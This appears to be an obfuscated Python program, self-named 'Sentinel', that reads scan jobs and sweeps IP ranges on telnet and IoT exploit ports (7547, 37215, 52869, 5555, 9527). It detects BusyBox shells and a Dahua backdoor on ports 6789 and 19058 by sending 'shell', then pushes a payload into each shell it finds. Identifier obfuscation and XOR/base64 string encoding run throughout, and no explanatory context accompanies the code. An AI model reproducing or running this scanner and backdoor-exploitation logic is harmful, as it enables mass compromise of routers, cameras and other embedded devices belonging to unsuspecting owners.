O0OO0O00000 [ i1I1I11iii1i ] == None : if 92 - 92: oOOoO00oo0 . O0oo * Oo0Oo * o0oooooO if 63 - 63: I11I1Ii + oOOo0000o / I11I1Ii * i1 * IIiIii1iI if 20 - 20: I11I1Ii if i1I1I11iii1i in i1II and not i1II [ i1I1I11iii1i ] == None and len ( i1II [ i1I1I11iii1i ] ) > 2 : iiIIiI1I = re . sub ( '^!' , '' , i1II [ i1I1I11iii1i ] ) iiIIiI1I = re . sub ( '\s\s+' , ' ' , iiIIiI1I ) if i1I1I11iii1i in OooO and not OooO [ i1I1I11iii1i ] == None : if oOI11IIIi1II111 : if I1i : Ii111i11iIi ( "%s SD:%s:%s" % ( i11I11III1iii [ i1I1I11iii1i ] , OooO [ i1I1I11iii1i ] , iiIIiI1I [ : 32 ] ) ) else : Ii111i11iIi ( "%s SD:%s:%s" % ( i11I11III1iii [ i1I1I11iii1i ] , OooO [ i1I1I11iii1i ] , iiIIiI1I [ : 2560 ] ) ) else : if 93 - 93: o0oooooO % oOOoO00oo0 * OOOoOooO . i1IIi1i1iiI * O0oo Iii1 = i11I11III1iii [ i1I1I11iii1i ] . split ( ':' ) O0Ooo0 = Iii1 [ 0 ] oo000Oo = int ( Iii1 [ 1 ] ) if IiiI1 or oo000Oo in iIii1IiI11II1 : Ii111i11iIi ( "%s SR:%s" % ( i11I11III1iii [ i1I1I11iii1i ] , iiIIiI1I [ : 512 ] ) ) if 76 - 76: Ii - I11I1Ii * OOooOO0 . IIiIIiIii1I if 'HTTP/' in iiIIiI1I [ : 5 ] : if 33 - 33: IIiII % IIiII * OOOoOooO if OO00oo0o : oOo0OOO0000 ( O0Ooo0 , oo000Oo , O0Ooo0 + '%%%' + 'PORT:%d:' % ( oo000Oo ) + iiIIiI1I [ : 1024 ] ) if oo000Oo == 5555 or oo000Oo == 7547 or oo000Oo == 37215 or oo000Oo == 52869 or 'Server: RomPager/4.07 UPnP/1.0' in iiIIiI1I : if 54 - 54: o0oooooO . o0ooO . Oo0Oo - IIiIIiIii1I O0iII111i1 ( O0Ooo0 , oo000Oo ) else : if 86 - 86: Oo0 * I11I1Ii - o0ooO + i1IIi1i1iiI if oo000Oo == 37215 or oo000Oo == 52869 : O0iII111i1 ( O0Ooo0 , oo000Oo ) if 85 - 85: OOooOO0 / oOOo0000o / Ii if OOoOo00oO0 : if oo000Oo != 6789 and oo000Oo != 19058 and oo000Oo != 37215 and oo000Oo != 52869 : if 89 - 89: o0oooooO . Oo0Oo / oOoO0Ooo - o0ooO + o0ooO . oOOo0000o if not 'SSH' in iiIIiI1I [ : 10 ] and not ( 'FTP' in iiIIiI1I and '220' in iiIIiI1I ) and not "RFB 004" in iiIIiI1I and not "220-FileZilla" in iiIIiI1I : if 56 - 56: oOoO0Ooo / Ii11i1iIi . OOOoOooO OoO00Ooo0OoOo0O0Oo ( O0Ooo0 , oo000Oo , 'PORT:%d:' % ( oo000Oo ) + iiIIiI1I [ : 512 ] ) if 80 - 80: OOOoOooO - OOOoOooO if 65 - 65: OOOoOooO % Oooo . Oo0Oo % Oooo + Oooo i1i1I1i1 = i11I11III1iii [ i1I1I11iii1i ] . split ( ':' ) if hash ( i1i1I1i1 [ 0 ] ) in oO0OoOoO00OoO : IiIIiI1iII1Ii . append ( i1i1I1i1 ) else : if Oo0O00OOooO : Ii111i11iIi ( "%s SO" % ( i11I11III1iii [ i1I1I11iii1i ] ) ) if 42 - 42: O0oo0OOOOO00 * o0ooO + Ii i1i1I1i1 = i11I11III1iii [ i1I1I11iii1i ] . split ( ':' ) Oo0oOOooO0 = i1i1I1i1 [ 0 ] iII111iI = int ( i1i1I1i1 [ 1 ] ) if not iII111iI in OoooOoo0 : iIi11II1i = hash ( Oo0oOOooO0 ) if not iIi11II1i in oO0OoOoO00OoO or oO0OoOoO00OoO [ iIi11II1i ] == None : oO0OoOoO00OoO [ iIi11II1i ] = 1 Iioo0OooOoO = time . time ( ) for O00OoOoOOoO0 in iIoO0O000oo : OoOo = Iioo0OooOoO + O00OoOoOOoO0 * 60 o0ooo0 = ( OoOo , Oo0oOOooO0 , iII111iI ) if 66 - 66: oOOoO00oo0 - OOooOO0 / OOOoOooO / i1IIi1i1iiI % Oo0 oooOoO0 ( o0ooo0 ) if 14 - 14: oOOo0000o . IIiII if 6 - 6: i1IIi1i1iiI % oOOoO00oo0 + i1IIi1i1iiI O000O0o0oOOo [ i1I1I11iii1i ] = None i11I11III1iii [ i1I1I11iii1i ] = None O0OO0O00000 [ i1I1I11iii1i ] = None i1II [ i1I1I11iii1i ] = None OooO [ i1I1I11iii1i ] = None if 5 - 5: IIiIIiIii1I if 49 - 49: oOOoO00oo0 def O0oOoo0000 ( ) : global I1i11II global O0OoO0O Iioo0OooOoO = time . time ( ) IiiIIIiiI1 = o0o0oOOo i1IIOO0OOoO00OO = 0 IIiI1i , O0o0 , IiIIiI11I = select . select ( [ ] , IiiIIIiiI1 , [ ] , 0.01 ) for IiI1iIIiI1I in IiiIIIiiI1 : i1I1I11iii1i = hash ( IiI1iIIiI1I ) o0oo0OOOo = IiI1iIIiI1I . getsockopt ( socket . SOL_SOCKET , socket . SO_ERROR ) if o0oo0OOOo != 0 : if 90 - 90: IIiII i111 ( IiI1iIIiI1I ) continue i1IIOO0OOoO00OO = 1 if IiI1iIIiI1I in O0o0 : if 2 - 2: o0oooooO if not i1I1I11iii1i in O0OO0O00000 or O0OO0O00000 [ i1I1I11iii1i ] == None : if 45 - 45: IIiII * IIiIIiIii1I + IIiII if 83 - 83: IIiIii1iI + OOOoOooO - oOOo0000o try : IiI1iIIiI1I . send ( "" ) ; except : if 57 - 57: i1IIi1i1iiI if 24 - 24: oOOoO00oo0 . oOOoO00oo0 % IIiII - IIiIIiIii1I i111 ( IiI1iIIiI1I ) continue if 85 - 85: o0ooO * IIiII O0OO0O00000 [ i1I1I11iii1i ] = 1 if 82 - 82: IIiIIiIii1I - OOooOO0 + i1 / O0oo0OOOOO00 Ii1i1i11I11Ii = i11I11III1iii [ i1I1I11iii1i ] . split ( ':' ) ; o0oO0o0ooo00 = Ii1i1i11I11Ii [ 0 ] ; O0OOOo0oOo = int ( Ii1i1i11I11Ii [ 1 ] ) ; if 10 - 10: Oo0 . oOOoO00oo0 . oOOo0000o - OOOoOooO - i1IIi1i1iiI + IIiIii1iI if 17 - 17: I11I1Ii - Oo0Oo / IIiIIiIii1I + IIiIii1iI if 58 - 58: Ii11i1iIi - OOooOO0 / IIiII / O0oo / O0oo if 99 - 99: I11I1Ii if 88 - 88: oOOoO00oo0 * Oooo if 46 - 46: Ii11i1iIi if 60 - 60: IIiIii1iI / OOOoOooO if 78 - 78: o0oooooO if 38 - 38: IIiII * IIiIii1iI . Ii - oOOo0000o if 66 - 66: oOOo0000o if 95 - 95: OOOoOooO + oOOoO00oo0 / oOOo0000o if O0OOOo0oOo in OoooOoo0 : if 83 - 83: Oooo / oOOo0000o if 64 - 64: o0ooO % o0ooO / oOOo0000o * O0oo0OOOOO00 - i1IIi1i1iiI + IIiII O0OO0O00000 [ i1I1I11iii1i ] = 2 try : IiI1iIIiI1I . send ( 'GET / HTTP/1.1\r\nHost: %s\r\n\r\n' % ( o0oO0o0ooo00 ) ) except : pass elif O0OOOo0oOo == 6789 or O0OOOo0oOo == 19058 : O0OO0O00000 [ i1I1I11iii1i ] = 2 try : IiI1iIIiI1I . send ( 'shell\n' ) ; except : pass if 55 - 55: I11I1Ii + IIiIIiIii1I + Ii11i1iIi + OOooOO0 % i1IIi1i1iiI if 44 - 44: OOOoOooO % Oo0 - IIiIIiIii1I O0 = '' try : O0 = IiI1iIIiI1I . recv ( 512 ) except : pass if 89 - 89: i1IIi1i1iiI + Oo0 - Oooo - O0oo0OOOOO00 try : for ii1iI1ii in re . findall ( '\xff\xfd.' , O0 ) : IiI1iIIiI1I . send ( '\xff\xfc' + ii1iI1ii [ 2 ] ) for oo0OOO0OOoOO in re . findall ( '\xff\xfb.' , O0 ) : IiI1iIIiI1I . send ( '\xff\xfe' + oo0OOO0OOoOO [ 2 ] ) except : pass if O0 : if 68 - 68: Oo0Oo if not i1I1I11iii1i in O0OO0O00000 or O0OO0O00000 [ i1I1I11iii1i ] != 3 : oO0iIiiiii1 [ hash ( i11I11III1iii [ i1I1I11iii1i ] ) ] = 1 O0OO0O00000 [ i1I1I11iii1i ] = 3 if 99 - 99: OOooOO0 + IIiIIiIii1I O0 = re . sub ( '\r?\n' , ';' , O0 ) O0 = re . sub ( '[^A-Za-z0-9 \.,:;<>\(\)\[\]\-+%!@/#$=]' , '' , O0 ) if i1I1I11iii1i in i1II and not i1II [ i1I1I11iii1i ] == None : i1II [ i1I1I11iii1i ] += O0 else : i1II [ i1I1I11iii1i ] = O0 if 21 - 21: i1 - IIiIii1iI . O0oo0OOOOO00 % oOOo0000o * Oooo if not i1I1I11iii1i in OooO or OooO [ i1I1I11iii1i ] == None : if ( re . search ( 'BusyBox v.*#' , i1II [ i1I1I11iii1i ] ) and not 'OpenWrt' in i1II [ i1I1I11iii1i ] ) or 'shell: ' in i1II [ i1I1I11iii1i ] : O0OOOo0oOo = int ( i11I11III1iii [ i1I1I11iii1i ] . split ( ':' ) [ 1 ] ) ; if O0OOOo0oOo == 6789 or O0OOOo0oOo == 19058 : OooO [ i1I1I11iii1i ] = "DahuaBackdoor" else : OooO [ i1I1I11iii1i ] = "BusyBox" try : if 87 - 87: oOOoO00oo0 / oOoO0Ooo - Oo0Oo . oOoO0Ooo + oOOo0000o - i1IIi1i1iiI IiI1iIIiI1I . send ( ii11II ) if 9 - 9: Oo0Oo % O0oo . oOOoO00oo0 . o0ooO . IIiIIiIii1I + OOOoOooO except : pass O000O0o0oOOo [ i1I1I11iii1i ] = time . time ( ) if 95 - 95: OOOoOooO * OOooOO0 % Ii11i1iIi IIiI1ii = 512 if i1I1I11iii1i in OooO and not OooO [ i1I1I11iii1i ] == None : IIiI1ii = 2560 if len ( i1II [ i1I1I11iii1i ] ) >= IIiI1ii : i111 ( IiI1iIIiI1I ) else : if 13 - 13: Ii % Oooo - IIiIIiIii1I - O0oo0OOOOO00 . Oooo if 85 - 85: IIiIIiIii1I % o0ooO if i1I1I11iii1i in O0OO0O00000 and O0OO0O00000 [ i1I1I11iii1i ] == 1 : if Iioo0OooOoO - O000O0o0oOOo [ i1I1I11iii1i ] > O0OoO0O : O0OO0O00000 [ i1I1I11iii1i ] = 2 ; o0oO0o0ooo00 = i11I11III1iii [ i1I1I11iii1i ] . split ( ':' ) [ 0 ] ; try : IiI1iIIiI1I . send ( 'GET / HTTP/1.1\r\nHost: %s\r\n\r\n' % ( o0oO0o0ooo00 ) ) except : pass if ( Iioo0OooOoO - O000O0o0oOOo [ i1I1I11iii1i ] > I1i11II ) : if 30 - 30: oOOo0000o - O0oo0OOOOO00 . IIiIIiIii1I + i1 * IIiIii1iI % Ii i111 ( IiI1iIIiI1I ) if 20 - 20: O0oo0OOOOO00 if 38 - 38: oOOoO00oo0 / Oo0 + IIiII / Ii / O0oo - Ii if 65 - 65: I11I1Ii + oOoO0Ooo def Iii1iIi1i ( data , key , encode = False , decode = False ) : if 60 - 60: O0oo + OOooOO0 / O0oo - o0ooO if 74 - 74: IIiII * oOoO0Ooo % OOooOO0 if 58 - 58: oOoO0Ooo . Oo0Oo % IIiIIiIii1I + i1 - OOooOO0 if 44 - 44: Ii11i1iIi + O0oo0OOOOO00 . Ii / O0oo if decode : data = binascii . a2b_base64 ( data ) i1i1IiIiIiii1iiiI = '' . join ( chr ( ord ( x ) ^ ord ( y ) ) for ( x , y ) in izip ( data , cycle ( key ) ) ) if encode : return binascii . b2a_base64 ( i1i1IiIiIiii1iiiI ) . strip ( ) return i1i1IiIiIiii1iiiI if 52 - 52: Oo0Oo . Oooo def IiiIi1111 ( ) : global I1i11IIii1iI1i1 global I1IiiIiii111I if 8 - 8: Ii11i1iIi + i1IIi1i1iiI % oOOoO00oo0 - i1 - Ii % OOOoOooO Iioo0OooOoO = time . time ( ) if 2 - 2: O0oo0OOOOO00 * OOOoOooO % Oo0 . OOooOO0 + Ii11i1iIi * IIiIii1iI if 82 - 82: IIiIIiIii1I + I11I1Ii Ii111i11iIi ( "STAT V: %d SCT: %d RSQ: %d BFJ: %d WPT: %d PUT: %d TRT: %d XMP: %d" % ( I1IiI1I1 , len ( ii1o00 ) , len ( Oo0Oooo ) , len ( ooooo0OOo0o ) , len ( O000oo0 ) , int ( Iioo0OooOoO - I1i11IIii1iI1i1 ) , len ( iii11II1I1I ) , len ( iIIiii11Ii1 ) ) ) if 40 - 40: O0oo - o0ooO - OOOoOooO % i1IIi1i1iiI I1i11 = False try : if os . path . isfile ( '/tmp/system/update/sentinel.reload' ) : I1i11 = True os . remove ( '/tmp/system/update/sentinel.reload' ) except : pass if 33 - 33: oOOoO00oo0 ii = False if 59 - 59: i1IIi1i1iiI . oOoO0Ooo * IIiIIiIii1I / Ii11i1iIi . oOOo0000o * I11I1Ii if Iioo0OooOoO - I1i11IIii1iI1i1 > ( 17 * 3600 ) and len ( ii1o00 ) < 300 and len ( ooooo0OOo0o ) == 0 and len ( O000oo0 ) == 0 and len ( iii11II1I1I ) == 0 : if 99 - 99: Ii11i1iIi Ii111i11iIi ( 'NOTC: 17h process restart' ) ii = True if 14 - 14: oOOo0000o - i1 - i1 . oOOoO00oo0 . oOOo0000o - O0oo if ii : if 72 - 72: Oooo for iI11i1i1iiI in O0oO0ooooOO : try : iI11i1i1iiI . close ( ) except : pass sys . exit ( 0 ) if 76 - 76: oOoO0Ooo / IIiIii1iI + O0oo if I1i11 : Ii111i11iIi ( 'NOTC: Sentinel reloading config.' ) Oo000o0OOOo ( '/tmp/system/control.cfg' ) if 67 - 67: oOoO0Ooo - oOoO0Ooo - oOoO0Ooo / Ii if 95 - 95: IIiIii1iI if 30 - 30: Ii11i1iIi / Ii11i1iIi * Oo0Oo / O0oo O00oOo = 0 try : IiIII1iiiI1ii = os . listdir ( '/tmp/system/update' ) for file in IiIII1iiiI1ii : Oo00oO0O = re . search ( '^sentinel\.jobreq\.SCN\.(\S+)\.(\d+\.\d+\.\d+\.)(\d+)\-(\d+)' , file ) if Oo00oO0O : if I1IiiIiii111I > 2100 : O00Oo0oOO0O = Oo00oO0O . group ( 1 ) iIIiII1i1 = Oo00oO0O . group ( 2 ) IiI1iIiII1 = int ( Oo00oO0O . group ( 3 ) ) oOO0 = int ( Oo00oO0O . group ( 4 ) ) Ii111i11iIi ( "NOTC: SCN ref %s for range %s%d - %s%d" % ( O00Oo0oOO0O , iIIiII1i1 , IiI1iIiII1 , iIIiII1i1 , oOO0 ) ) os . remove ( '/tmp/system/update/' + file ) for IiiiI in range ( IiI1iIiII1 , oOO0 + 1 ) : oOo00OoOO0oo = iIIiII1i1 + '%d' % ( IiiiI ) iII1I1I ( oOo00OoOO0oo , 1 ) break else : Ii111i11iIi ( "NOTC: Skipping SCN due to low system RAM %d" % ( I1IiiIiii111I ) ) O00oOo += 1 Oo00oO0O = re . search ( '^sentinel\.jobreq\.SCN\.(\S+)\.(\d+\.\d+\.\d+\.\d+)' , file ) if Oo00oO0O : O00Oo0oOO0O = Oo00oO0O . group ( 1 ) oOo00OoOO0oo = Oo00oO0O . group ( 2 ) Ii111i11iIi ( "NOTC: SCN ref %s for ip %s" % ( O00Oo0oOO0O , oOo00OoOO0oo ) ) os . remove ( '/tmp/system/update/' + file ) iII1I1I ( oOo00OoOO0oo , 1 ) continue Oo00oO0O = re . search ( '^sentinel\.jobreq\.SCP\.(\S+)\.(\d+)_(\d+\.\d+\.\d+\.)(\d+)\-(\d+)' , file ) if Oo00oO0O : O00Oo0oOO0O = Oo00oO0O . group ( 1 ) oo0OOOo00oOOO0OO = int ( Oo00oO0O . group ( 2 ) ) iIIiII1i1 = Oo00oO0O . group ( 3 ) IiI1iIiII1 = int ( Oo00oO0O . group ( 4 ) ) oOO0 = int ( Oo00oO0O . group ( 5 ) ) Ii111i11iIi ( "NOTC: SCP ref %s for range %s%d - %s%d port %d" % ( O00Oo0oOO0O , iIIiII1i1 , IiI1iIiII1 , iIIiII1i1 , oOO0 , oo0OOOo00oOOO0OO ) ) os . remove ( '/tmp/system/update/' + file ) if 24 - 24: OOOoOooO if oo0OOOo00oOOO0OO == 1 : for IiiiI in range ( IiI1iIiII1 , oOO0 + 1 ) : oOo00OoOO0oo = iIIiII1i1 + '%d' % ( IiiiI ) IIii1IIi1I ( oOo00OoOO0oo , 23 ) IIii1IIi1I ( oOo00OoOO0oo , 80 ) IIii1IIi1I ( oOo00OoOO0oo , 7547 ) IIii1IIi1I ( oOo00OoOO0oo , 9527 ) IIii1IIi1I ( oOo00OoOO0oo , 37215 ) IIii1IIi1I ( oOo00OoOO0oo , 52869 ) elif oo0OOOo00oOOO0OO == 2 : for IiiiI in range ( IiI1iIiII1 , oOO0 + 1 ) : oOo00OoOO0oo = iIIiII1i1 + '%d' % ( IiiiI ) IIii1IIi1I ( oOo00OoOO0oo , 23 ) IIii1IIi1I ( oOo00OoOO0oo , 80 ) IIii1IIi1I ( oOo00OoOO0oo , 81 ) IIii1IIi1I ( oOo00OoOO0oo , 8080 ) IIii1IIi1I ( oOo00OoOO0oo , 7547 ) IIii1IIi1I ( oOo00OoOO0oo , 5555 ) IIii1IIi1I ( oOo00OoOO0oo , 37215 ) IIii1IIi1I ( oOo00OoOO0oo , 52869 ) elif oo0OOOo00oOOO0OO == 3 : for IiiiI in range ( IiI1iIiII1 , oOO0 + 1 ) : oOo00OoOO0oo = iIIiII1i1 + '%d' % ( IiiiI ) IIii1IIi1I ( oOo00OoOO0oo , 23 ) IIii1IIi1I ( oOo00OoOO0oo , 80 ) IIii1IIi1I ( oOo00OoOO0oo , 81 ) IIii1IIi1I ( oOo00OoOO0oo , 8080 ) IIii1IIi1I ( oOo00OoOO0oo , 37215 ) IIii1IIi1I ( oOo00OoOO0oo , 52869 ) elif oo0OOOo00oOOO0OO == 4 : for IiiiI in range ( IiI1iIiII1 , oOO0 + 1 ) : oOo00OoOO0oo = iIIiII1i1 + '%d' % ( IiiiI ) IIii1IIi1I ( oOo00OoOO0oo , 23 ) IIii1IIi1I ( oOo00OoOO0oo , 60023 ) IIii1IIi1I ( oOo00OoOO0oo , 4719 ) IIii1IIi1I ( oOo00OoOO0oo , 80 ) IIii1IIi1I ( oOo00OoOO0oo , 81 ) IIii1IIi1I ( oOo00OoOO0oo , 8080 ) IIii1IIi1I ( oOo00OoOO0oo , 37215 ) IIii1IIi1I ( oOo00OoOO0oo , 52869 ) elif oo0OOOo00oOOO0OO == 5 : for IiiiI in range ( IiI1iIiII1 , oOO0 + 1 ) : oOo00OoOO0oo = iIIiII1i1 + '%d' % ( IiiiI ) IIii1IIi1I ( oOo00OoOO0oo , 80 ) IIii1IIi1I ( oOo00OoOO0oo , 81 ) IIii1IIi1I ( oOo00OoOO0oo , 82 ) IIii1IIi1I ( oOo00OoOO0oo , 88 ) IIii1IIi1I ( oOo00OoOO0oo , 8080 ) IIii1IIi1I ( oOo00OoOO0oo , 8081 ) IIii1IIi1I ( oOo00OoOO0oo , 8181 ) IIii1IIi1I ( oOo00OoOO0oo , 8888 ) IIii1IIi1I ( oOo00OoOO0oo , 37215 ) IIii1IIi1I ( oOo00OoOO0oo , 52869 ) elif oo0OOOo00oOOO0OO == 6 : for IiiiI in range ( IiI1iIiII1 , oOO0 + 1 ) : oOo00OoOO0oo = iIIiII1i1 + '%d' % ( IiiiI ) IIii1IIi1I ( oOo00OoOO0oo , 23 ) IIii1IIi1I ( oOo00OoOO0oo , 2323 ) IIii1IIi1I ( oOo00OoOO0oo , 23231 ) IIii1IIi1I ( oOo00OoOO0oo , 23123 ) IIii1IIi1I ( oOo00OoOO0oo , 5358 ) IIii1IIi1I ( oOo00OoOO0oo , 6789 ) IIii1IIi1I ( oOo00OoOO0oo , 8023 ) IIii1IIi1I ( oOo00OoOO0oo , 60023 ) IIii1IIi1I ( oOo00OoOO0oo , 4719 ) IIii1IIi1I ( oOo00OoOO0oo , 9527 ) IIii1IIi1I ( oOo00OoOO0oo , 37215 ) IIii1IIi1I ( oOo00OoOO0oo , 52869 ) elif oo0OOOo00oOOO0OO == 7 : for IiiiI in range ( IiI1iIiII1 , oOO0 + 1 ) : oOo00OoOO0oo = iIIiII1i1 + '%d' % ( IiiiI ) IIii1IIi1I ( oOo00OoOO0oo , 23 ) IIii1IIi1I ( oOo00OoOO0oo , 8023 ) IIii1IIi1I ( oOo00OoOO0oo , 80 ) IIii1IIi1I ( oOo00OoOO0oo , 81 ) IIii1IIi1I ( oOo00OoOO0oo , 8080 ) IIii1IIi1I ( oOo00OoOO0oo , 8000 ) IIii1IIi1I ( oOo00OoOO0oo , 90 ) IIii1IIi1I ( oOo00OoOO0oo , 9000 ) IIii1IIi1I ( oOo00OoOO0oo , 37215 ) IIii1IIi1I ( oOo00OoOO0oo , 52869 ) elif oo0OOOo00oOOO0OO == 9 : for IiiiI in range ( IiI1iIiII1 , oOO0 + 1 ) : oOo00OoOO0oo = iIIiII1i1 + '%d' % ( IiiiI ) IIii1IIi1I ( oOo00OoOO0oo , 23 ) IIii1IIi1I ( oOo00OoOO0oo , 80 ) IIii1IIi1I ( oOo00OoOO0oo , 81 ) IIii1IIi1I ( oOo00OoOO0oo , 8080 ) IIii1IIi1I ( oOo00OoOO0oo , 7547 ) IIii1IIi1I ( oOo00OoOO0oo , 5555 ) IIii1IIi1I ( oOo00OoOO0oo , random . randint ( 1 , 65535 ) ) IIii1IIi1I ( oOo00OoOO0oo , 37215 ) IIii1IIi1I ( oOo00OoOO0oo , 52869 ) elif oo0OOOo00oOOO0OO == 10 : for IiiiI in range ( IiI1iIiII1 , oOO0 + 1 ) : oOo00OoOO0oo = iIIiII1i1 + '%d' % ( IiiiI ) IIii1IIi1I ( oOo00OoOO0oo , 23 ) IIii1IIi1I ( oOo00OoOO0oo , 80 ) IIii1IIi1I ( oOo00OoOO0oo , 81 ) IIii1IIi1I ( oOo00OoOO0oo , 8080 ) IIii1IIi1I ( oOo00OoOO0oo , random . randint ( 1 , 65535 ) ) IIii1IIi1I ( oOo00OoOO0oo , random . randint ( 1 , 65535 ) ) IIii1IIi1I ( oOo00OoOO0oo , random . randint ( 1 , 65535 ) ) IIii1IIi1I ( oOo00OoOO0oo , random . randint ( 1 , 65535 ) ) IIii1IIi1I ( oOo00OoOO0oo , random . randint ( 1 , 65535 ) ) IIii1IIi1I ( oOo00OoOO0oo , random . randint ( 1 , 65535 ) ) IIii1IIi1I ( oOo00OoOO0oo , 37215 ) IIii1IIi1I ( oOo00OoOO0oo , 52869 ) elif oo0OOOo00oOOO0OO == 11 : for IiiiI in range ( IiI1iIiII1 , oOO0 + 1 ) : oOo00OoOO0oo = iIIiII1i1 + '%d' % ( IiiiI ) IIii1IIi1I ( oOo00OoOO0oo , 23 ) IIii1IIi1I ( oOo00OoOO0oo , 80 ) IIii1IIi1I ( oOo00OoOO0oo , 81 ) IIii1IIi1I ( oOo00OoOO0oo , 82 ) IIii1IIi1I ( oOo00OoOO0oo , 8080 ) IIii1IIi1I ( oOo00OoOO0oo , 7547 ) IIii1IIi1I ( oOo00OoOO0oo , 8023 ) IIii1IIi1I ( oOo00OoOO0oo , 60023 ) IIii1IIi1I ( oOo00OoOO0oo , 23231 ) IIii1IIi1I ( oOo00OoOO0oo , 9527 ) IIii1IIi1I ( oOo00OoOO0oo , random . randint ( 1 , 65535 ) ) IIii1IIi1I ( oOo00OoOO0oo , 37215 ) IIii1IIi1I ( oOo00OoOO0oo , 52869 ) elif oo0OOOo00oOOO0OO == 12 : for IiiiI in range ( IiI1iIiII1 , oOO0 + 1 ) : oOo00OoOO0oo = iIIiII1i1 + '%d' % ( IiiiI ) IIii1IIi1I ( oOo00OoOO0oo , 23 ) IIii1IIi1I ( oOo00OoOO0oo , 80 ) IIii1IIi1I ( oOo00OoOO0oo , 81 ) IIii1IIi1I ( oOo00OoOO0oo , 82 ) IIii1IIi1I ( oOo00OoOO0oo , 8080 ) IIii1IIi1I ( oOo00OoOO0oo , 8023 ) IIii1IIi1I ( oOo00OoOO0oo , 60023 ) IIii1IIi1I ( oOo00OoOO0oo , 23231 ) IIii1IIi1I ( oOo00OoOO0oo , random . randint ( 1 , 65535 ) ) IIii1IIi1I ( oOo00OoOO0oo , 37215 ) IIii1IIi1I ( oOo00OoOO0oo , 52869 ) elif oo0OOOo00oOOO0OO == 13 : for IiiiI in range ( IiI1iIiII1 , oOO0 + 1 ) : oOo00OoOO0oo = iIIiII1i1 + '%d' % ( IiiiI ) IIii1IIi1I ( oOo00OoOO0oo , 23 ) IIii1IIi1I ( oOo00OoOO0oo , 2323 ) IIii1IIi1I ( oOo00OoOO0oo , 80 ) IIii1IIi1I ( oOo00OoOO0oo , 81 ) IIii1IIi1I ( oOo00OoOO0oo , 8080 ) IIii1IIi1I ( oOo00OoOO0oo , 7547 ) IIii1IIi1I ( oOo00OoOO0oo , 37215 ) IIii1IIi1I ( oOo00OoOO0oo , 52869 ) else : for IiiiI in range ( IiI1iIiII1 , oOO0 + 1 ) : oOo00OoOO0oo = iIIiII1i1 + '%d' % ( IiiiI ) IIii1IIi1I ( oOo00OoOO0oo , oo0OOOo00oOOO0OO ) break else : Oo00oO0O = re . search ( '^sentinel\.jobreq\.SCP\.(\S+)\.(\d+)_(\d+\.\d+\.\d+\.\d+)' , file ) if Oo00oO0O : O00Oo0oOO0O = Oo00oO0O . group ( 1 ) oo0OOOo00oOOO0OO = int ( Oo00oO0O . group ( 2 ) ) oOo00OoOO0oo = Oo00oO0O . group ( 3 ) Ii111i11iIi ( "NOTC: SCP ref %s for ip %s port %d" % ( O00Oo0oOO0O , oOo00OoOO0oo , oo0OOOo00oOOO0OO ) ) os . remove ( '/tmp/system/update/' + file ) IIii1IIi1I ( oOo00OoOO0oo , oo0OOOo00oOOO0OO ) continue except : pass if 49 - 49: Oo0Oo * oOOo0000o * Oooo + oOOoO00oo0 . IIiIii1iI / oOOoO00oo0 if O00oOo >= 3 : Ii111i11iIi ( "ERR: Backlog of %d scans due to low RAM %d" % ( O00oOo , I1IiiIiii111I ) ) if 28 - 28: IIiII if 89 - 89: I11I1Ii % O0oo * Ii11i1iIi if 75 - 75: IIiIii1iI / i1 / OOOoOooO . O0oo0OOOOO00 * Oooo / Oo0Oo if 77 - 77: Oooo if 8 - 8: OOOoOooO / IIiII time . sleep ( 3 ) if 89 - 89: Ii % IIiII - i1 * o0oooooO . Ii11i1iIi if 41 - 41: i1 if 87 - 87: IIiIii1iI - Oo0Oo + oOOoO00oo0 + O0oo0OOOOO00 . O0oo0OOOOO00 OOOoooO0 = 0 iii1iiI111ii = False for Ooo0o0oOO0o in II1I1i11 : O0O0 = socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) O0O0 . setsockopt ( socket . SOL_SOCKET , socket . SO_REUSEADDR , 1 ) try : O0O0 . bind ( ( '0.0.0.0' , int ( Ooo0o0oOO0o ) ) ) O0O0 . listen ( 5 ) O0oO0ooooOO . append ( O0O0 ) Iiii [ int ( Ooo0o0oOO0o ) ] = O0O0 OOOoooO0 += 1 except : pass if 11 - 11: Oooo if 79 - 79: OOooOO0 / O0oo0OOOOO00 - Oo0 Ii111i11iIi ( "Sentinel Process Launch (%d listeners)" % ( OOOoooO0 ) ) if 67 - 67: i1IIi1i1iiI + oOOo0000o if 100 - 100: i1 + Oo0Oo - i1 / Oo0 * i1IIi1i1iiI if 70 - 70: I11I1Ii + Ii * IIiIii1iI % O0oo0OOOOO00 . O0oo0OOOOO00 if 30 - 30: Oo0Oo - i1 . Oo0 if 11 - 11: oOOo0000o * OOOoOooO * oOOo0000o / i1IIi1i1iiI if 30 - 30: IIiII / i1IIi1i1iiI * oOOoO00oo0 if 8 - 8: OOooOO0 + oOOo0000o * Oooo if 96 - 96: i1 + oOoO0Ooo if 96 - 96: i1 if 5 - 5: IIiIIiIii1I if 26 - 26: O0oo0OOOOO00 % i1 - o0ooO / Oooo + O0oo0OOOOO00 if 1 - 1: oOoO0Ooo % o0oooooO - I11I1Ii * IIiII + I11I1Ii if 10 - 10: Oooo + Oooo / Oo0Oo if 66 - 66: Oo0Oo * Ii11i1iIi i1I1oooo0oOooo = time . time ( ) Ii1i1iI1IiI = 0 O00oO0OOoOo = time . time ( ) o0o0o00oooOoo = time . time ( ) if 70 - 70: OOooOO0 * O0oo % OOOoOooO . oOOoO00oo0 while True : ii1IIIi1 ( ) if 91 - 91: o0oooooO / O0oo0OOOOO00 * IIiII + O0oo0OOOOO00 . OOooOO0 + oOoO0Ooo Iioo0OooOoO = time . time ( ) OoOO0Oo ( ) OOO0000OO0oO0 ( ) OooOo0o0oO0 ( ) oOOoOO ( ) O00o0oOOO0O0 ( ) Ooo0OO ( ) IIi1IIIIIi ( ) iI11IiI1 ( ) Oo0Oo0o ( ) IIiI1i , O0o0 , IiIIiI11I = select . select ( O0oO0ooooOO , [ ] , [ ] , 0.01 ) for iI11i1i1iiI in IIiI1i : try : III1 , Ii1ii1II1I = iI11i1i1iiI . accept ( ) except : continue oOoOo0oooo , ii1i1I = Ii1ii1II1I iiIi1I1 = hash ( oOoOo0oooo ) if iiIi1I1 in I1I1I11 : try : III1 . close ( ) except : pass if 59 - 59: o0oooooO continue I1I1I11 [ iiIi1I1 ] = 1 OOOoo0 , Oo0o = III1 . getsockname ( ) if Oo0o in i11 : if 82 - 82: Ii11i1iIi % i1IIi1i1iiI % Oo0Oo * IIiII oOo00o . append ( III1 ) iIIiii = hash ( III1 ) O0oOo [ iIIiii ] = '%s:%d>%s:%d' % ( oOoOo0oooo , ii1i1I , OOOoo0 , Oo0o ) else : if i111IIIiII1i : Ii111i11iIi ( 